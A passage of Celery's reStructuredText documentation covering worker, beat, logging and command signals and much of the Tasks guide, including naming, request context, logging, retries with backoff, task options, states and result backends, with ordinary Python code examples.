signal:: heartbeat_sent ``heartbeat_sent`` ~~~~~~~~~~~~~~~~~~ Dispatched when Celery sends a worker heartbeat. Sender is the :class:`celery.worker.heartbeat.Heart` instance. .. signal:: worker_shutting_down ``worker_shutting_down`` ~~~~~~~~~~~~~~~~~~~~~~~~ Dispatched when the worker begins the shutdown process. Provides arguments: * ``sig`` The POSIX signal that was received. * ``how`` The shutdown method, warm or cold. * ``exitcode`` The exitcode that will be used when the main process exits. .. signal:: worker_process_init ``worker_process_init`` ~~~~~~~~~~~~~~~~~~~~~~~ Dispatched in all pool child processes when they start. Note that handlers attached to this signal mustn't be blocking for more than 4 seconds, or the process will be killed assuming it failed to start. .. signal:: worker_process_shutdown ``worker_process_shutdown`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Dispatched in all pool child processes just before they exit. Note: There's no guarantee that this signal will be dispatched, similarly to :keyword:`finally` blocks it's impossible to guarantee that handlers will be called at shutdown, and if called it may be interrupted during. Provides arguments: * ``pid`` The pid of the child process that's about to shutdown. * ``exitcode`` The exitcode that'll be used when the child process exits. .. signal:: worker_shutdown ``worker_shutdown`` ~~~~~~~~~~~~~~~~~~~ Dispatched when the worker is about to shut down. Beat Signals ------------ .. signal:: beat_init ``beat_init`` ~~~~~~~~~~~~~ Dispatched when :program:`celery beat` starts (either standalone or embedded). Sender is the :class:`celery.beat.Service` instance. .. signal:: beat_embedded_init ``beat_embedded_init`` ~~~~~~~~~~~~~~~~~~~~~~ Dispatched in addition to the :signal:`beat_init` signal when :program:`celery beat` is started as an embedded process. Sender is the :class:`celery.beat.Service` instance. Eventlet Signals ---------------- .. signal:: eventlet_pool_started ``eventlet_pool_started`` ~~~~~~~~~~~~~~~~~~~~~~~~~ Sent when the eventlet pool has been started. Sender is the :class:`celery.concurrency.eventlet.TaskPool` instance. .. signal:: eventlet_pool_preshutdown ``eventlet_pool_preshutdown`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Sent when the worker shutdown, just before the eventlet pool is requested to wait for remaining workers. Sender is the :class:`celery.concurrency.eventlet.TaskPool` instance. .. signal:: eventlet_pool_postshutdown ``eventlet_pool_postshutdown`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Sent when the pool has been joined and the worker is ready to shutdown. Sender is the :class:`celery.concurrency.eventlet.TaskPool` instance. .. signal:: eventlet_pool_apply ``eventlet_pool_apply`` ~~~~~~~~~~~~~~~~~~~~~~~ Sent whenever a task is applied to the pool. Sender is the :class:`celery.concurrency.eventlet.TaskPool` instance. Provides arguments: * ``target`` The target function. * ``args`` Positional arguments. * ``kwargs`` Keyword arguments. Logging Signals --------------- .. signal:: setup_logging ``setup_logging`` ~~~~~~~~~~~~~~~~~ Celery won't configure the loggers if this signal is connected, so you can use this to completely override the logging configuration with your own. If you'd like to augment the logging configuration setup by Celery then you can use the :signal:`after_setup_logger` and :signal:`after_setup_task_logger` signals. Provides arguments: * ``loglevel`` The level of the logging object. * ``logfile`` The name of the logfile. * ``format`` The log format string. 
* ``colorize`` Specify if log messages are colored or not.

.. signal:: after_setup_logger

``after_setup_logger``
~~~~~~~~~~~~~~~~~~~~~~

Sent after the setup of every global logger (not task loggers).
Used to augment logging configuration.

Provides arguments:

* ``logger`` The logger object.
* ``loglevel`` The level of the logging object.
* ``logfile`` The name of the logfile.
* ``format`` The log format string.
* ``colorize`` Specify if log messages are colored or not.

.. signal:: after_setup_task_logger

``after_setup_task_logger``
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Sent after the setup of every single task logger.
Used to augment logging configuration.

Provides arguments:

* ``logger`` The logger object.
* ``loglevel`` The level of the logging object.
* ``logfile`` The name of the logfile.
* ``format`` The log format string.
* ``colorize`` Specify if log messages are colored or not.

Command signals
---------------

.. signal:: user_preload_options

``user_preload_options``
~~~~~~~~~~~~~~~~~~~~~~~~

This signal is sent after any of the Celery command line programs
have finished parsing the user preload options.

It can be used to add additional command-line arguments to the
:program:`celery` umbrella command:

.. code-block:: python

    from celery import Celery
    from celery import signals
    from celery.bin.base import Option

    app = Celery()
    app.user_options['preload'].add(Option(
        '--monitoring', action='store_true',
        help='Enable our external monitoring utility, blahblah',
    ))

    @signals.user_preload_options.connect
    def handle_preload_options(options, **kwargs):
        if options['monitoring']:
            enable_monitoring()

Sender is the :class:`~celery.bin.base.Command` instance, and the value
depends on the program that was called (e.g., for the umbrella command
it'll be a :class:`~celery.bin.celery.CeleryCommand` object).

Provides arguments:

* ``app`` The app instance.
* ``options`` Mapping of the parsed user preload options (with default values).

Deprecated Signals
------------------

.. signal:: task_sent

``task_sent``
~~~~~~~~~~~~~

This signal is deprecated; please use :signal:`after_task_publish` instead.

.. _sphinx:

==============================
 Documenting Tasks with Sphinx
==============================

This document describes how to auto-generate documentation for Tasks
using Sphinx.

--------------------------------
 celery.contrib.sphinx
--------------------------------

.. automodule:: celery.contrib.sphinx
    :members:
    :noindex:

.. _guide-tasks:

=====================================================================
 Tasks
=====================================================================

Tasks are the building blocks of Celery applications.

A task is a class that can be created out of any callable. It performs
dual roles in that it defines both what happens when a task is
called (sends a message), and what happens when a worker receives that message.

Every task class has a unique name, and this name is referenced in messages
so the worker can find the right function to execute.
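For instance, here is a minimal sketch (the module name ``tasks`` and the
broker URL are assumptions made for this example) showing the dual roles
and the generated name:

.. code-block:: python

    from celery import Celery

    app = Celery('tasks', broker='amqp://localhost')  # assumed broker URL

    @app.task
    def add(x, y):
        # The function body runs in the worker process; calling .delay()
        # only publishes a message that references the task by name.
        return x + y

    result = add.delay(2, 2)  # sends a task message, returns an AsyncResult
    print(add.name)           # -> 'tasks.add'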
A task message is not removed from the queue until that message has been :term:`acknowledged` by a worker. A worker can reserve many messages in advance and even if the worker is killed -- by power failure or some other reason -- the message will be redelivered to another worker. Ideally task functions should be :term:`idempotent`: meaning the function won't cause unintended effects even if called multiple times with the same arguments. Since the worker cannot detect if your tasks are idempotent, the default behavior is to acknowledge the message in advance, just before it's executed, so that a task invocation that already started is never executed again. If your task is idempotent you can set the :attr:`~Task.acks_late` option to have the worker acknowledge the message *after* the task returns instead. See also the FAQ entry :ref:`faq-acks_late-vs-retry`. Note that the worker will acknowledge the message if the child process executing the task is terminated (either by the task calling :func:`sys.exit`, or by signal) even when :attr:`~Task.acks_late` is enabled. This behavior is intentional as... #. We don't want to rerun tasks that forces the kernel to send a :sig:`SIGSEGV` (segmentation fault) or similar signals to the process. #. We assume that a system administrator deliberately killing the task does not want it to automatically restart. #. A task that allocates too much memory is in danger of triggering the kernel OOM killer, the same may happen again. #. A task that always fails when redelivered may cause a high-frequency message loop taking down the system. If you really want a task to be redelivered in these scenarios you should consider enabling the :setting:`task_reject_on_worker_lost` setting. .. warning:: A task that blocks indefinitely may eventually stop the worker instance from doing any other work. If your task does I/O then make sure you add timeouts to these operations, like adding a timeout to a web request using the :pypi:`requests` library: .. code-block:: python connect_timeout, read_timeout = 5.0, 30.0 response = requests.get(URL, timeout=(connect_timeout, read_timeout)) :ref:`Time limits ` are convenient for making sure all tasks return in a timely manner, but a time limit event will actually kill the process by force so only use them to detect cases where you haven't used manual timeouts yet. In previous versions, the default prefork pool scheduler was not friendly to long-running tasks, so if you had tasks that ran for minutes/hours, it was advised to enable the :option:`-Ofair ` command-line argument to the :program:`celery worker`. However, as of version 4.0, -Ofair is now the default scheduling strategy. See :ref:`optimizing-prefetch-limit` for more information, and for the best performance route long-running and short-running tasks to dedicated workers (:ref:`routing-automatic`). If your worker hangs then please investigate what tasks are running before submitting an issue, as most likely the hanging is caused by one or more tasks hanging on a network operation. -- In this chapter you'll learn all about defining tasks, and this is the **table of contents**: .. contents:: :local: :depth: 1 .. _task-basics: Basics ====== You can easily create a task from any callable by using the :meth:`@task` decorator: .. 
code-block:: python from .models import User @app.task def create_user(username, password): User.objects.create(username=username, password=password) There are also many :ref:`options ` that can be set for the task, these can be specified as arguments to the decorator: .. code-block:: python @app.task(serializer='json') def create_user(username, password): User.objects.create(username=username, password=password) .. sidebar:: How do I import the task decorator? And what's "app"? The task decorator is available on your :class:`@Celery` application instance, if you don't know what this is then please read :ref:`first-steps`. If you're using Django (see :ref:`django-first-steps`), or you're the author of a library then you probably want to use the :func:`@shared_task` decorator: .. code-block:: python from celery import shared_task @shared_task def add(x, y): return x + y .. sidebar:: Multiple decorators When using multiple decorators in combination with the task decorator you must make sure that the `task` decorator is applied last (oddly, in Python this means it must be first in the list): .. code-block:: python @app.task @decorator2 @decorator1 def add(x, y): return x + y Bound tasks ----------- A task being bound means the first argument to the task will always be the task instance (``self``), just like Python bound methods: .. code-block:: python logger = get_task_logger(__name__) @app.task(bind=True) def add(self, x, y): logger.info(self.request.id) Bound tasks are needed for retries (using :meth:`Task.retry() <@Task.retry>`), for accessing information about the current task request, and for any additional functionality you add to custom task base classes. Task inheritance ---------------- The ``base`` argument to the task decorator specifies the base class of the task: .. code-block:: python import celery class MyTask(celery.Task): def on_failure(self, exc, task_id, args, kwargs, einfo): print('{0!r} failed: {1!r}'.format(task_id, exc)) @app.task(base=MyTask) def add(x, y): raise KeyError() .. _task-names: Names ===== Every task must have a unique name. If no explicit name is provided the task decorator will generate one for you, and this name will be based on 1) the module the task is defined in, and 2) the name of the task function. Example setting explicit name: .. code-block:: pycon >>> @app.task(name='sum-of-two-numbers') >>> def add(x, y): ... return x + y >>> add.name 'sum-of-two-numbers' A best practice is to use the module name as a name-space, this way names won't collide if there's already a task with that name defined in another module. .. code-block:: pycon >>> @app.task(name='tasks.add') >>> def add(x, y): ... return x + y You can tell the name of the task by investigating its ``.name`` attribute: .. code-block:: pycon >>> add.name 'tasks.add' The name we specified here (``tasks.add``) is exactly the name that would've been automatically generated for us if the task was defined in a module named :file:`tasks.py`: :file:`tasks.py`: .. code-block:: python @app.task def add(x, y): return x + y .. code-block:: pycon >>> from tasks import add >>> add.name 'tasks.add' .. _task-name-generator-info: Changing the automatic naming behavior -------------------------------------- .. versionadded:: 4.0 There are some cases when the default automatic naming isn't suitable. 
Consider having many tasks within many different modules:: project/ /__init__.py /celery.py /moduleA/ /__init__.py /tasks.py /moduleB/ /__init__.py /tasks.py Using the default automatic naming, each task will have a generated name like `moduleA.tasks.taskA`, `moduleA.tasks.taskB`, `moduleB.tasks.test`, and so on. You may want to get rid of having `tasks` in all task names. As pointed above, you can explicitly give names for all tasks, or you can change the automatic naming behavior by overriding :meth:`@gen_task_name`. Continuing with the example, `celery.py` may contain: .. code-block:: python from celery import Celery class MyCelery(Celery): def gen_task_name(self, name, module): if module.endswith('.tasks'): module = module[:-6] return super().gen_task_name(name, module) app = MyCelery('main') So each task will have a name like `moduleA.taskA`, `moduleA.taskB` and `moduleB.test`. .. warning:: Make sure that your :meth:`@gen_task_name` is a pure function: meaning that for the same input it must always return the same output. .. _task-request-info: Task Request ============ :attr:`Task.request <@Task.request>` contains information and state related to the currently executing task. The request defines the following attributes: :id: The unique id of the executing task. :group: The unique id of the task's :ref:`group `, if this task is a member. :chord: The unique id of the chord this task belongs to (if the task is part of the header). :correlation_id: Custom ID used for things like de-duplication. :args: Positional arguments. :kwargs: Keyword arguments. :origin: Name of host that sent this task. :retries: How many times the current task has been retried. An integer starting at `0`. :is_eager: Set to :const:`True` if the task is executed locally in the client, not by a worker. :eta: The original ETA of the task (if any). This is in UTC time (depending on the :setting:`enable_utc` setting). :expires: The original expiry time of the task (if any). This is in UTC time (depending on the :setting:`enable_utc` setting). :hostname: Node name of the worker instance executing the task. :delivery_info: Additional message delivery information. This is a mapping containing the exchange and routing key used to deliver this task. Used by for example :meth:`Task.retry() <@Task.retry>` to resend the task to the same destination queue. Availability of keys in this dict depends on the message broker used. :reply-to: Name of queue to send replies back to (used with RPC result backend for example). :called_directly: This flag is set to true if the task wasn't executed by the worker. :timelimit: A tuple of the current ``(soft, hard)`` time limits active for this task (if any). :callbacks: A list of signatures to be called if this task returns successfully. :errback: A list of signatures to be called if this task fails. :utc: Set to true the caller has UTC enabled (:setting:`enable_utc`). .. versionadded:: 3.1 :headers: Mapping of message headers sent with this task message (may be :const:`None`). :reply_to: Where to send reply to (queue name). :correlation_id: Usually the same as the task id, often used in amqp to keep track of what a reply is for. .. versionadded:: 4.0 :root_id: The unique id of the first task in the workflow this task is part of (if any). :parent_id: The unique id of the task that called this task (if any). :chain: Reversed list of tasks that form a chain (if any). The last item in this list will be the next task to succeed the current task. 
If using version one of the task protocol the chain tasks will be in ``request.callbacks`` instead. .. versionadded:: 5.2 :properties: Mapping of message properties received with this task message (may be :const:`None` or :const:`{}`) :replaced_task_nesting: How many times the task was replaced, if at all. (may be :const:`0`) Example ------- An example task accessing information in the context is: .. code-block:: python @app.task(bind=True) def dump_context(self, x, y): print('Executing task id {0.id}, args: {0.args!r} kwargs: {0.kwargs!r}'.format( self.request)) The ``bind`` argument means that the function will be a "bound method" so that you can access attributes and methods on the task type instance. .. _task-logging: Logging ======= The worker will automatically set up logging for you, or you can configure logging manually. A special logger is available named "celery.task", you can inherit from this logger to automatically get the task name and unique id as part of the logs. The best practice is to create a common logger for all of your tasks at the top of your module: .. code-block:: python from celery.utils.log import get_task_logger logger = get_task_logger(__name__) @app.task def add(x, y): logger.info('Adding {0} + {1}'.format(x, y)) return x + y Celery uses the standard Python logger library, and the documentation can be found :mod:`here `. You can also use :func:`print`, as anything written to standard out/-err will be redirected to the logging system (you can disable this, see :setting:`worker_redirect_stdouts`). .. note:: The worker won't update the redirection if you create a logger instance somewhere in your task or task module. If you want to redirect ``sys.stdout`` and ``sys.stderr`` to a custom logger you have to enable this manually, for example: .. code-block:: python import sys logger = get_task_logger(__name__) @app.task(bind=True) def add(self, x, y): old_outs = sys.stdout, sys.stderr rlevel = self.app.conf.worker_redirect_stdouts_level try: self.app.log.redirect_stdouts_to_logger(logger, rlevel) print('Adding {0} + {1}'.format(x, y)) return x + y finally: sys.stdout, sys.stderr = old_outs .. note:: If a specific Celery logger you need is not emitting logs, you should check that the logger is propagating properly. In this example "celery.app.trace" is enabled so that "succeeded in" logs are emitted: .. code-block:: python import celery import logging @celery.signals.after_setup_logger.connect def on_after_setup_logger(**kwargs): logger = logging.getLogger('celery') logger.propagate = True logger = logging.getLogger('celery.app.trace') logger.propagate = True .. note:: If you want to completely disable Celery logging configuration, use the :signal:`setup_logging` signal: .. code-block:: python import celery @celery.signals.setup_logging.connect def on_setup_logging(**kwargs): pass .. _task-argument-checking: Argument checking ----------------- .. versionadded:: 4.0 Celery will verify the arguments passed when you call the task, just like Python does when calling a normal function: .. code-block:: pycon >>> @app.task ... def add(x, y): ... 
return x + y # Calling the task with two arguments works: >>> add.delay(8, 8) # Calling the task with only one argument fails: >>> add.delay(8) Traceback (most recent call last): File "", line 1, in File "celery/app/task.py", line 376, in delay return self.apply_async(args, kwargs) File "celery/app/task.py", line 485, in apply_async check_arguments(*(args or ()), **(kwargs or {})) TypeError: add() takes exactly 2 arguments (1 given) You can disable the argument checking for any task by setting its :attr:`~@Task.typing` attribute to :const:`False`: .. code-block:: pycon >>> @app.task(typing=False) ... def add(x, y): ... return x + y # Works locally, but the worker receiving the task will raise an error. >>> add.delay(8) .. _task-hiding-sensitive-information: Hiding sensitive information in arguments ----------------------------------------- .. versionadded:: 4.0 When using :setting:`task_protocol` 2 or higher (default since 4.0), you can override how positional arguments and keyword arguments are represented in logs and monitoring events using the ``argsrepr`` and ``kwargsrepr`` calling arguments: .. code-block:: pycon >>> add.apply_async((2, 3), argsrepr='(, )') >>> charge.s(account, card='1234 5678 1234 5678').set( ... kwargsrepr=repr({'card': '**** **** **** 5678'}) ... ).delay() .. warning:: Sensitive information will still be accessible to anyone able to read your task message from the broker, or otherwise able intercept it. For this reason you should probably encrypt your message if it contains sensitive information, or in this example with a credit card number the actual number could be stored encrypted in a secure store that you retrieve and decrypt in the task itself. .. _task-retry: Retrying ======== :meth:`Task.retry() <@Task.retry>` can be used to re-execute the task, for example in the event of recoverable errors. When you call ``retry`` it'll send a new message, using the same task-id, and it'll take care to make sure the message is delivered to the same queue as the originating task. When a task is retried this is also recorded as a task state, so that you can track the progress of the task using the result instance (see :ref:`task-states`). Here's an example using ``retry``: .. code-block:: python @app.task(bind=True) def send_twitter_status(self, oauth, tweet): try: twitter = Twitter(oauth) twitter.update_status(tweet) except (Twitter.FailWhaleError, Twitter.LoginError) as exc: raise self.retry(exc=exc) .. note:: The :meth:`Task.retry() <@Task.retry>` call will raise an exception so any code after the retry won't be reached. This is the :exc:`~@Retry` exception, it isn't handled as an error but rather as a semi-predicate to signify to the worker that the task is to be retried, so that it can store the correct state when a result backend is enabled. This is normal operation and always happens unless the ``throw`` argument to retry is set to :const:`False`. The bind argument to the task decorator will give access to ``self`` (the task type instance). The ``exc`` argument is used to pass exception information that's used in logs, and when storing task results. Both the exception and the traceback will be available in the task state (if a result backend is enabled). If the task has a ``max_retries`` value the current exception will be re-raised if the max number of retries has been exceeded, but this won't happen if: - An ``exc`` argument wasn't given. In this case the :exc:`~@MaxRetriesExceededError` exception will be raised. 
- There's no current exception

If there's no original exception to re-raise the ``exc`` argument will
be used instead, so:

.. code-block:: python

    self.retry(exc=Twitter.LoginError())

will raise the ``exc`` argument given.

.. _task-retry-custom-delay:

Using a custom retry delay
--------------------------

When a task is to be retried, it can wait for a given amount of time
before doing so, and the default delay is defined by the
:attr:`~@Task.default_retry_delay` attribute. By default this is set to
3 minutes. Note that the unit for setting the delay is in seconds
(int or float).

You can also provide the `countdown` argument to :meth:`~@Task.retry` to
override this default.

.. code-block:: python

    @app.task(bind=True, default_retry_delay=30 * 60)  # retry in 30 minutes.
    def add(self, x, y):
        try:
            something_raising()
        except Exception as exc:
            # overrides the default delay to retry after 1 minute
            raise self.retry(exc=exc, countdown=60)

.. _task-autoretry:

Automatic retry for known exceptions
------------------------------------

.. versionadded:: 4.0

Sometimes you just want to retry a task whenever a particular exception
is raised.

Fortunately, you can tell Celery to automatically retry a task using
the `autoretry_for` argument in the :meth:`@task` decorator:

.. code-block:: python

    from twitter.exceptions import FailWhaleError

    @app.task(autoretry_for=(FailWhaleError,))
    def refresh_timeline(user):
        return twitter.refresh_timeline(user)

If you want to specify custom arguments for an internal :meth:`~@Task.retry`
call, pass the `retry_kwargs` argument to the :meth:`@task` decorator:

.. code-block:: python

    @app.task(autoretry_for=(FailWhaleError,),
              retry_kwargs={'max_retries': 5})
    def refresh_timeline(user):
        return twitter.refresh_timeline(user)

This is provided as an alternative to manually handling the exceptions,
and the example above will do the same as wrapping the task body
in a :keyword:`try` ... :keyword:`except` statement:

.. code-block:: python

    @app.task(bind=True)
    def refresh_timeline(self, user):
        try:
            return twitter.refresh_timeline(user)
        except FailWhaleError as exc:
            raise self.retry(exc=exc, max_retries=5)

If you want to automatically retry on any error, simply use:

.. code-block:: python

    @app.task(autoretry_for=(Exception,))
    def x():
        ...

.. versionadded:: 4.2

If your tasks depend on another service, like making a request to an API,
then it's a good idea to use `exponential backoff`_ to avoid overwhelming the
service with your requests. Fortunately, Celery's automatic retry support
makes it easy. Just specify the :attr:`~Task.retry_backoff` argument,
like this:

.. code-block:: python

    from requests.exceptions import RequestException

    @app.task(autoretry_for=(RequestException,), retry_backoff=True)
    def x():
        ...

By default, this exponential backoff will also introduce random jitter_ to
avoid having all the tasks run at the same moment. It will also cap the
maximum backoff delay to 10 minutes. All these settings can be customized
via options documented below.

.. versionadded:: 4.4

You can also set `autoretry_for`, `max_retries`, `retry_backoff`,
`retry_backoff_max` and `retry_jitter` options in class-based tasks:

.. code-block:: python

    class BaseTaskWithRetry(Task):
        autoretry_for = (TypeError,)
        max_retries = 5
        retry_backoff = True
        retry_backoff_max = 700
        retry_jitter = False

.. attribute:: Task.autoretry_for

    A list/tuple of exception classes. If any of these exceptions are raised
    during the execution of the task, the task will automatically be retried.
    By default, no exceptions will be autoretried.

..
attribute:: Task.max_retries A number. Maximum number of retries before giving up. A value of ``None`` means task will retry forever. By default, this option is set to ``3``. .. attribute:: Task.retry_backoff A boolean, or a number. If this option is set to ``True``, autoretries will be delayed following the rules of `exponential backoff`_. The first retry will have a delay of 1 second, the second retry will have a delay of 2 seconds, the third will delay 4 seconds, the fourth will delay 8 seconds, and so on. (However, this delay value is modified by :attr:`~Task.retry_jitter`, if it is enabled.) If this option is set to a number, it is used as a delay factor. For example, if this option is set to ``3``, the first retry will delay 3 seconds, the second will delay 6 seconds, the third will delay 12 seconds, the fourth will delay 24 seconds, and so on. By default, this option is set to ``False``, and autoretries will not be delayed. .. attribute:: Task.retry_backoff_max A number. If ``retry_backoff`` is enabled, this option will set a maximum delay in seconds between task autoretries. By default, this option is set to ``600``, which is 10 minutes. .. attribute:: Task.retry_jitter A boolean. `Jitter`_ is used to introduce randomness into exponential backoff delays, to prevent all tasks in the queue from being executed simultaneously. If this option is set to ``True``, the delay value calculated by :attr:`~Task.retry_backoff` is treated as a maximum, and the actual delay value will be a random number between zero and that maximum. By default, this option is set to ``True``. .. _task-options: List of Options =============== The task decorator can take a number of options that change the way the task behaves, for example you can set the rate limit for a task using the :attr:`rate_limit` option. Any keyword argument passed to the task decorator will actually be set as an attribute of the resulting task class, and this is a list of the built-in attributes. General ------- .. _task-general-options: .. attribute:: Task.name The name the task is registered as. You can set this name manually, or a name will be automatically generated using the module and class name. See also :ref:`task-names`. .. attribute:: Task.request If the task is being executed this will contain information about the current request. Thread local storage is used. See :ref:`task-request-info`. .. attribute:: Task.max_retries Only applies if the task calls ``self.retry`` or if the task is decorated with the :ref:`autoretry_for ` argument. The maximum number of attempted retries before giving up. If the number of retries exceeds this value a :exc:`~@MaxRetriesExceededError` exception will be raised. .. note:: You have to call :meth:`~@Task.retry` manually, as it won't automatically retry on exception.. The default is ``3``. A value of :const:`None` will disable the retry limit and the task will retry forever until it succeeds. .. attribute:: Task.throws Optional tuple of expected error classes that shouldn't be regarded as an actual error. Errors in this list will be reported as a failure to the result backend, but the worker won't log the event as an error, and no traceback will be included. Example: .. code-block:: python @task(throws=(KeyError, HttpNotFound)): def get_foo(): something() Error types: - Expected errors (in ``Task.throws``) Logged with severity ``INFO``, traceback excluded. - Unexpected errors Logged with severity ``ERROR``, with traceback included. .. 
attribute:: Task.default_retry_delay Default time in seconds before a retry of the task should be executed. Can be either :class:`int` or :class:`float`. Default is a three minute delay. .. attribute:: Task.rate_limit Set the rate limit for this task type (limits the number of tasks that can be run in a given time frame). Tasks will still complete when a rate limit is in effect, but it may take some time before it's allowed to start. If this is :const:`None` no rate limit is in effect. If it is an integer or float, it is interpreted as "tasks per second". The rate limits can be specified in seconds, minutes or hours by appending `"/s"`, `"/m"` or `"/h"` to the value. Tasks will be evenly distributed over the specified time frame. Example: `"100/m"` (hundred tasks a minute). This will enforce a minimum delay of 600ms between starting two tasks on the same worker instance. Default is the :setting:`task_default_rate_limit` setting: if not specified means rate limiting for tasks is disabled by default. Note that this is a *per worker instance* rate limit, and not a global rate limit. To enforce a global rate limit (e.g., for an API with a maximum number of requests per second), you must restrict to a given queue. .. attribute:: Task.time_limit The hard time limit, in seconds, for this task. When not set the workers default is used. .. attribute:: Task.soft_time_limit The soft time limit for this task. When not set the workers default is used. .. attribute:: Task.ignore_result Don't store task state. Note that this means you can't use :class:`~celery.result.AsyncResult` to check if the task is ready, or get its return value. .. attribute:: Task.store_errors_even_if_ignored If :const:`True`, errors will be stored even if the task is configured to ignore results. .. attribute:: Task.serializer A string identifying the default serialization method to use. Defaults to the :setting:`task_serializer` setting. Can be `pickle`, `json`, `yaml`, or any custom serialization methods that have been registered with :mod:`kombu.serialization.registry`. Please see :ref:`calling-serializers` for more information. .. attribute:: Task.compression A string identifying the default compression scheme to use. Defaults to the :setting:`task_compression` setting. Can be `gzip`, or `bzip2`, or any custom compression schemes that have been registered with the :mod:`kombu.compression` registry. Please see :ref:`calling-compression` for more information. .. attribute:: Task.backend The result store backend to use for this task. An instance of one of the backend classes in `celery.backends`. Defaults to `app.backend`, defined by the :setting:`result_backend` setting. .. attribute:: Task.acks_late If set to :const:`True` messages for this task will be acknowledged **after** the task has been executed, not *just before* (the default behavior). Note: This means the task may be executed multiple times should the worker crash in the middle of execution. Make sure your tasks are :term:`idempotent`. The global default can be overridden by the :setting:`task_acks_late` setting. .. _task-track-started: .. attribute:: Task.track_started If :const:`True` the task will report its status as "started" when the task is executed by a worker. The default value is :const:`False` as the normal behavior is to not report that level of granularity. Tasks are either pending, finished, or waiting to be retried. Having a "started" status can be useful for when there are long running tasks and there's a need to report what task is currently running. 
The host name and process id of the worker executing the task will be available in the state meta-data (e.g., `result.info['pid']`) The global default can be overridden by the :setting:`task_track_started` setting. .. seealso:: The API reference for :class:`~@Task`. .. _task-states: States ====== Celery can keep track of the tasks current state. The state also contains the result of a successful task, or the exception and traceback information of a failed task. There are several *result backends* to choose from, and they all have different strengths and weaknesses (see :ref:`task-result-backends`). During its lifetime a task will transition through several possible states, and each state may have arbitrary meta-data attached to it. When a task moves into a new state the previous state is forgotten about, but some transitions can be deduced, (e.g., a task now in the :state:`FAILED` state, is implied to have been in the :state:`STARTED` state at some point). There are also sets of states, like the set of :state:`FAILURE_STATES`, and the set of :state:`READY_STATES`. The client uses the membership of these sets to decide whether the exception should be re-raised (:state:`PROPAGATE_STATES`), or whether the state can be cached (it can if the task is ready). You can also define :ref:`custom-states`. .. _task-result-backends: Result Backends --------------- If you want to keep track of tasks or need the return values, then Celery must store or send the states somewhere so that they can be retrieved later. There are several built-in result backends to choose from: SQLAlchemy/Django ORM, Memcached, RabbitMQ/QPid (``rpc``), and Redis -- or you can define your own. No backend works well for every use case. You should read about the strengths and weaknesses of each backend, and choose the most appropriate for your needs. .. warning:: Backends use resources to store and transmit results. To ensure that resources are released, you must eventually call :meth:`~@AsyncResult.get` or :meth:`~@AsyncResult.forget` on EVERY :class:`~@AsyncResult` instance returned after calling a task. .. seealso:: :ref:`conf-result-backend` RPC Result Backend (RabbitMQ/QPid) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The RPC result backend (`rpc://`) is special as it doesn't actually *store* the states, but rather sends them as messages. This is an important difference as it means that a result *can only be retrieved once*, and *only by the client that initiated the task*. Two different processes can't wait for the same result. Even with that limitation, it is an excellent choice if you need to receive state changes in real-time. Using messaging means the client doesn't have to poll for new states. The messages are transient (non-persistent) by default, so the results will disappear if the broker restarts. You can configure the result backend to send persistent messages using the :setting:`result_persistent` setting. Database Result Backend ~~~~~~~~~~~~~~~~~~~~~~~ Keeping state in the database can be convenient for many, especially for web applications with a database already in place, but it also comes with limitations. * Polling the database for new states is expensive, and so you should increase the polling intervals of operations, such as `result.get()`. * Some databases use a default transaction isolation level that isn't suitable for polling tables for changes. 
In MySQL the default transaction isolation level is `REPEATABLE-READ`: meaning the transaction won't see changes made by other transactions until the current transaction is committed. Changing that to the `READ-COMMITTED` isolation level is recommended. .. _task-builtin-states: Built-in States --------------- .. state:: PENDING PENDING ~~~~~~~ Task is waiting for execution or unknown. Any task id that's not known is implied to be in the pending state. .. state:: STARTED STARTED ~~~~~~~ Task has been started. Not reported by default, to enable please see :attr:`@Task.track_started`. :meta-data: `pid` and `hostname` of the worker process executing the task. .. state:: SUCCESS SUCCESS ~~~~~~~ Task has been successfully executed. :meta-data: `result` contains the return value of the task. :propagates: Yes :ready: Yes .. state:: FAILURE FAILURE ~~~~~~~ Task execution resulted in failure. :meta-data: `result` contains the exception occurred, and `traceback` contains the backtrace of the stack at the point when the exception was raised. :propagates: Yes .. state:: RETRY RETRY ~~~~~ Task is being retried. :meta-data: `result` contains the exception that caused the retry, and `traceback` contains the backtrace of the stack at the point when the exceptions was raised. :propagates: No .. state:: REVOKED REVOKED ~~~~~~~ Task has been revoked. :propagates: Yes .. _custom-states: Custom states ------------- You can easily define your own states, all you need is a unique name. The name of the state is usually an uppercase string. As an example you could have a look at the :mod:`abortable tasks <~celery.contrib.abortable>` which defines a custom :state:`ABORTED` state. Use :meth:`~@Task.update_state` to update a task's state:. .. code-block:: python @app.task(bind=True) def upload_files(self, filenames): for i, file in enumerate(filenames): if not self.request.called_directly: self.update_state(state='PROGRESS', meta={'current': i, 'total': len(filenames)}) Here I created the state `"PROGRESS"`, telling any application aware of this state that the task is currently in progress, and also where it is in the process by having `current` and `total` counts as part of the state meta-data. This can then be used to create progress bars for example. .. _pickling_exceptions: Creating pickleable exceptions ------------------------------ A rarely known Python fact is that exceptions must conform to some simple rules to support being serialized by the pickle module. Tasks that raise exceptions that aren't pickleable won't work properly when Pickle is used as the serializer. To make sure that your exceptions are pickleable the exception *MUST* provide the original arguments it was instantiated with in its ``.args`` attribute. The simplest way to ensure this is to have the exception call ``Exception.__init__``. Let's look at some examples that work, and one that doesn't: .. code-block:: python # OK: class HttpError(Exception): pass # BAD: class HttpError(Exception): def __init__(self, status_code): self.status_code = status_code # OK: class HttpError(Exception): def __init__(self, status_code): self.status_code = status_code Exception.__init__(self, status_code) # <-- REQUIRED So the rule is: For any exception that supports custom arguments ``*args``, ``Exception.__init__(self, *args)`` must be used. There's no special support for *keyword arguments*, so if you want to preserve keyword arguments when the exception is unpickled you have to pass them as regular args: .. 
